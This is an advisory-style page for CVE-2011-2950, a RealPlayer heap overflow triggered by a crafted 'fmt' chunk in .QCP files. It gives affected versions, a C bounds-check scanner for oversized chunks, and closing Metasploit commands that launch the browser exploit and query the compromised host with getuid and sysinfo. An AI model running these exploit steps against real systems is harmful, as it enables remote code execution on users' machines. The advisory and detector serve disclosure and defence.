Timeline:

Vulnerability discovered by Sean de Regge and submitted to ZDI
Vulnerability reported to vendor by ZDI on 2011-04-01
Coordinated public release of the vulnerability on 2011-08-16
Metasploit PoC provided on 2011-09-16

PoC provided by:

Sean de Regge
juan vazquez

Reference(s):

CVE-2011-2950
ZDI-11-265
OSVDB-74549

Affected version(s):

RealPlayer 11.0 – 11.1
RealPlayer SP 1.0 – 1.1.5
RealPlayer 14.0.0 – 14.0.5

Tested on Windows XP SP3 with:

Internet Explorer 7.0.5730.13
Apple RealPlayer 14.0.2.633

Description:

This module exploits a heap overflow in RealPlayer when handling a .QCP file. The specific flaw exists within qcpfformat.dll: a static 256-byte buffer is allocated on the heap, and user-supplied data from the file is copied into it within a memory copy loop. This allows a remote attacker to execute arbitrary code in the context of the web browser via a .QCP file with a specially crafted “fmt” chunk. At present the module exploits the flaw on Windows XP with IE6 and IE7.
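The missing check behind the overflow described above is a comparison of the "fmt" chunk's declared length against the fixed 256-byte buffer. The following is an added example (not code from the Metasploit module or from RealNetworks): a bounds-checked chunk walker that flags .QCP files whose "fmt " chunk declares more data than that buffer holds, usable as a file scanner or as the hardened form of the copy. It assumes the RIFF/QLCM layout of RFC 3625 for QCP files; the samples it builds are constructed header fragments, not real recordings.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#define FMT_BUF_SIZE 256   /* the fixed heap buffer size named in the advisory */
enum qcp_check { QCP_OK, QCP_TRUNCATED, QCP_BAD_MAGIC, QCP_FMT_OVERSIZED, QCP_NO_FMT };

static uint32_t rd32le(const uint8_t *p) { return p[0] | p[1] << 8 | p[2] << 16 | (uint32_t)p[3] << 24; }
static void wr32le(uint8_t *p, uint32_t v) { for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i)); }

/* Bounds-checked walk of the RIFF chunk list (assumed QLCM layout per RFC 3625).
 * Returns QCP_FMT_OVERSIZED when the "fmt " chunk declares more bytes than the
 * fixed buffer holds: the size check the vulnerable copy loop in qcpfformat.dll lacks. */
enum qcp_check qcp_check_fmt(const uint8_t *buf, size_t len) {
    if (len < 12) return QCP_TRUNCATED;
    if (memcmp(buf, "RIFF", 4) != 0 || memcmp(buf + 8, "QLCM", 4) != 0) return QCP_BAD_MAGIC;
    size_t off = 12;
    while (off + 8 <= len) {                          /* room for a chunk header */
        uint32_t csize = rd32le(buf + off + 4);
        if (memcmp(buf + off, "fmt ", 4) == 0)        /* decide on the declared size, not the bytes present */
            return csize > FMT_BUF_SIZE ? QCP_FMT_OVERSIZED : QCP_OK;
        if (csize > len - off - 8) return QCP_TRUNCATED;
        off += 8 + csize + (csize & 1u);              /* RIFF pads odd-sized chunks */
    }
    return QCP_NO_FMT;
}

/* Constructed sample (not a real recording): RIFF/QLCM header plus one "fmt "
 * chunk whose header declares `declared` bytes but which carries `payload` bytes. */
size_t make_sample(uint8_t *out, size_t cap, uint32_t declared, size_t payload) {
    if (cap < 20 + payload) return 0;
    memcpy(out, "RIFF", 4);  wr32le(out + 4, (uint32_t)(12 + payload));
    memcpy(out + 8, "QLCM", 4);
    memcpy(out + 12, "fmt ", 4);  wr32le(out + 16, declared);
    memset(out + 20, 0, payload);
    return 20 + payload;
}

/* Builds a constructed sample in a local buffer and runs the check on it. */
enum qcp_check check_constructed(uint32_t declared, size_t payload) {
    uint8_t f[512];
    size_t n = make_sample(f, sizeof f, declared, payload);
    return n ? qcp_check_fmt(f, n) : QCP_TRUNCATED;
}

int main(void) {
    printf("benign fmt (150 bytes, RFC 3625) -> %d\n", check_constructed(150, 150));   /* 0 = QCP_OK */
    printf("oversized fmt (declares 4096)    -> %d\n", check_constructed(0x1000, 64)); /* 3 = QCP_FMT_OVERSIZED */
    return 0;
}
```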

Commands:

use exploit/windows/browser/realplayer_qcp
set SRVHOST 192.168.178.21
exploit
getuid
sysinfo